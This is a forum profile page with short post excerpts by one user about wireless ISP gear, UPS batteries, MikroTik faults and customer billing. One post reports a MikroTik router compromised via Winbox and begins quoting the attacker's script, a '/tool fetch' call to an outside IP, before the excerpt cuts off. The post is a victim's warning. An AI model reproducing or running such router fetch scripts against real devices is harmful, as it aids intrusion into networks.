Перейти до

userok

Сitizens
  • Всього повідомлень

    119
  • Приєднався

  • Останній візит

  • Дней в лидерах

    1

Все, що було написано userok

  1. Alver, Вы можете расписать подробно, как перевести сеть убнт (база - клиенты) на Ваш гибрид (БС камбиум - клиенты убнт) какие точки на базу ставить 1000,2000, lite, gps sync...... какие сейчас акции на лицензии (цена на 10 20 30 шт) как происходит "подключение" лицензий елевейт в случае повреждения оборудования после грозы, что происходит с лицензиями у кого покупать оборудование, лицензии.. максимально подробно весь алгоритм.... если не можете в паблике, ответ можно в лс.
  2. Призма первого поколения или второго? Что у абонов стоит AC или микс с M5 ? Как обстоят дела с эфиром?
  3. Спору нет, методики взлома давно уже известны, но не все обновляются до фиксовых версий...
  4. Без лишних подробностей. ссыль Очередной раз через уязвимость winbox на одной из последних прошивках 6.41.3 якобы безопасных был взломан микротик на раз-два! Суть проблемы — вход злоумышленника через winbox с ip 95.154.216.160 абсолютно без проблем, в моём случае 2 неудачных попытки входа и 3-й успешный вход под второй учёткой со сложным паролем нигде не засвеченным. Под этим логином не входили никогда, создана учётка про запас на случай потери основного пароля. Далее после входа злоумышленник на микротике: 1. Создаёт скрипт script1_ /tool fetch address=95.154.216.
  5. userok

    Пропав лінк

    был случай линк между домами по двуглазым сфп, работал больше года, визуальная проверка и замена активки ничего не дала, в итоге после просвета лазером один из lc коннекторов не светился, замена патч корда с проблемной стороны помогла. и да мороз был -20
  6. userok

    Проблема с Ubnt latency

    data rate module почему не дефолтный?, max tx rate на максималку мцс15, у некоторых абонов кросировка скорости, что с ней?
  7. да вроде ж за двойку и расписал какие нюансы с ними были, а за 5ку добавил как бонус
  8. Сталкивался с подобной ситуацией не однократно, - менял прошивки, сканил эфир, ставил на разных растояниях, игрался с мощьностью, гдето помогало а гдето и нет. В итоге делаю вывод что проблема кроется в самом устройстве, т.к. старые добрые бриджи работают без перебоев там где бимы лагают. Еще один глюк бимов, только на 5ке, выставляю к примеру частоту 5000, а на вкладке мейн показывает 4950.Еще на пятрке в режиме точка - точка не всегда удается зайти на удаленную точку пока идет трафик, при этом точка пинается без проблем. У кого есть что добавить, напишите, потому что с бимами очень много пр
  9. блок питания родной, да и на корпусе кажется 28в написано, но все равно перепроверю на другом бп. кстати порты были заняты практически все, если на портах сделать петли это смоделирует его работу как в реальных условиях?
  10. После года непрерывной работы, в один прекрасный день начали реконектится одновременно все физические интерфейсы с промежутком 5-7 сек. ось стоит 6.5 фирмваре железа обновил до последней возможной. Во время отвала портов винбокс отключатся не успевал поэтому была возможность посмотреть температуру и напряжение: +30 градусов и 24.4 Вольта. Ребут не помогает. Началось все это после морозов - стоял в ящике на тех этаже, после кустарного подогрева лампой вроде заработал, но дефект время от времени проявляется даже с подогревом. проблема исчезает так же как и появляется. Какие мысли могут быть по
  11. Ден, дайте контакты/сайт вашего поставщика если не затруднит
  12. по поводу веса вот некоторые цифры: panasonic lc-p127r2p ~2.60 кг csb gp1272 f2 ~2.50 кг greatpower pg12-7.2 ~2.00 кг обратите внимание первым двум лет по 6 а то и больше последний покупался в сигнализацию года 3 назад
  13. а как на счет csb к примеру GP1272 F2, есть много сайтов на которых уверяют что продают оригинал, показывают большую емкость от указанного номинала меряя их хитрым прибором кулон-12м, стоит ли зацикливаться?
  14. Всем доброго вечера, подходит время замены аккумуляторов в упсах (поверкомы, микроваты),в связи с этим хотелось бы услышать отзывы и рекомендации по выбору аккумуляторной продукции. кто что брал, насколько реальные параметры, а то не хочется покупать черные коробочки набитые пенопластом...
  15. по поводу рассрочки, у кого есть деньги те и так подключатся, а вот кто просит в долг, этот контингент постоянно будет тянуть кота за яйки, то задолженность по интернету, если у вас есть услуга ухода в минус, то не вовремя будет погашать рассрочку, и что интересно эта неплатежеспособная группа самая требовательная к качеству услуг. (не грузятся одноклассники, тормозит компьютер из-за вашего интернета, за что неплачу такие деньги ...)
  16. попробуйте в сервисном меню поискать всякого рода диагностические тесты, калибровки и т.п.
  17. userok

    Продам nanostation m5 б.у.

    есть товар есть купец, развели демагогию
  18. skype:serhiy131 озвучьте решение по данному вопросу в теме, будет полезнее
  19. Был подобный случай с наностанцией М5, днем работала нормально к ночи ресетилась, все типичные проверки и замены оборудования не давали результата , в итоге оказалось что на проводке заходящей с улицы в электросчетчик слабо была закручена клема, по логике я так понимаю вечером нагрузка возрастала (лампочки телик, стиралка..) и кидался в домовую электропроводку всплеск от чего нанос сходил с ума. Закончилось все подтяжкой клемы, но нанос все таки пострадал - TX не поднимается выше mcs7-65.
  20. В таком случае надо начинать с диагностики - заменить эту железку на 100% рабочую, проблемную поставить кому нибудь и наблюдать.
  21. если мак пробить по производителю то это ASRock Incorporation, странно... что стоит на базе и что у клиента?
  22. userok

    Microwatt

    Не ясно в чем вы ТС пытаетесь уличить микровата. Человек уважаемый на форуме, продукция его вполне адекватная, ели у вас возникли притенении решайте их в личной беседе. Не понимаю таких выкладок.
  23. userok

    Виїзд до абонента за 25 км

    Дешевле разработать методические указания, и в случае проблемы действовать в телефонном режиме. А вот выезд на такие расстояния должен быть платным в крайнем случае на топливо.
  24. Изначально таким способом Вы (топикстартер) приобретете проблем в будущем больше чем есть, - проблемы несовместимости и прочее. Суть проблем с ноутами Вы не конкретизировали. Проще все таки попытаться установить винду на ноуты и сделать образ акронисом для конкретной модели. Если проблема с отсутствием двд привода, тогда проще раскошелиться и купите его себе, - пригодится или устанавливайте с флешки. В противном Вы будете сталкиваться с "индивидульными" софтовыми ремонтами, которые будут отнимать времени больше чем переустановка винды в штатном режиме.
  25. userok

    Продам NanoBeam

    хоть фото реальных железок выложите, интересно ведь!!!
×
×
  • Створити нове...